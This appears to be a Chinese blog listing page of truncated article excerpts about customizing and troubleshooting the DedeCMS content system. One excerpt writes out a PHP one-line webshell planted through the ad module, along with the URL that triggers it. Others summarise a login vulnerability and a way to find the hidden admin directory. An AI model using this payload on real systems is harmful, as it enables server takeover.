dede有时看到比较好的文章需要复制,粘贴到自己的dede后台发布,dede是有图片自动本地化的功能,就是复制过来后自动下载到你的服务器上了,这样省去了你单独去另存图片再上传的过程,尤其是遇到有很多图片的文章,会省不少时间,下面我将举例可能造成的原因首先我用的就是dede系统,也遇到了图片不能自动本 ...
分类:
其他好文 时间:
2018-05-27 14:46:57
阅读次数:
444
方法一:正则匹配去除 打开include/ arc.archives.class.php,查找代码: //设置全局环境变量 $this->Fields['typename'] = $this->TypeLink->TypeInfos['typename']; @SetSysEnv($this->Fi ...
分类:
其他好文 时间:
2018-05-25 13:30:42
阅读次数:
242
最近需要做几个企业站,所以呢,考虑了一下,没有用phpcms,而选择了 织梦。毕竟么,织梦用来做企业站还是比较合适的。好了,进正题: 在本地调试的时候,会非常的卡顿。调试的方法如下: 安装目录/data/common.inc.php 将localhost 改为 127.0.0.1 。 好了,去试试吧 ...
分类:
其他好文 时间:
2018-05-22 23:52:21
阅读次数:
231
重点文件在:/data/cache/inc_catalog_base.inc.php文件,里面存放的是栏目ID 先找到 /dede/sys_cache_up.php(后台更新缓存的地方),找到里面的UpDateCatCache();方法,然后跳转到UpDateCatCache();的所在页面:/de ...
分类:
其他好文 时间:
2018-05-18 15:32:53
阅读次数:
459
遇到一个被阉割的后台,发现直接传shell显然不行。 然后就有了下文 添加一个新广告。 插入一句话木马: 1 --><?php $_GET[c]($_POST[x]);?><!-- 然后访问: /plus/ad_js.php?aid=42&c=assert aid后面的值是你广告的id。 ...
分类:
系统相关 时间:
2018-05-15 22:37:51
阅读次数:
257
需要修改 /include/arc.archives.class.php (默认) 搜索 GetPreNext( 或 上一篇 找到 同样的 在 ...
分类:
其他好文 时间:
2018-04-06 23:51:27
阅读次数:
213
我的前后分离,不是api,不是ajax,我这里只讨论html与后端结合前话曾经风靡一时的dedecms相信做网站的十有八、九都知道,还有那么一些不是技术出生的人,通过看一下文档,也能访问出网站出来,有的人说dedecms太垃圾了,不知道是从哪些方面来说的,但不得不承认它的优势,又有哪个框架免费给你用,还这么方便的呢话说回来,dedecms的一大好处就是会模板标签,差不多就会慢慢的做套网页了,真的就
漏洞触发点在include/memberlogin.class.php中的MemberLogin类中的登录校验函数 可以看到M_ID参数是由GetNum(GetCookie("DedeUserId"))赋值的。 之后通过intval()函数对M_ID进行整数转换便没有再进行任何处理和过滤,然后通过S ...
分类:
其他好文 时间:
2018-03-23 10:29:43
阅读次数:
1667
打开 \include\arc.archives.class.php 1. 找到 $this->PreNext['pre'] = "上一篇:<a href='$mlink'>{$preRow['title']}</a> "; 改为 $this->PreNext['prem'] = "上一篇:<a h ...
分类:
移动开发 时间:
2018-03-05 16:03:13
阅读次数:
579
本文作者:红日安全团队——Mochazz 早上看了先知论坛的这篇文章:解决DEDECMS历史难题–找后台目录 不得不说作者思路确实巧妙,作者巧妙的利用了Windows FindFirstFile和织梦程序代码中对上传图片的逻辑判断,成功在Windows环境下爆破出后台目录。可能一些人不了解Windo ...
分类:
其他好文 时间:
2018-03-01 13:23:32
阅读次数:
234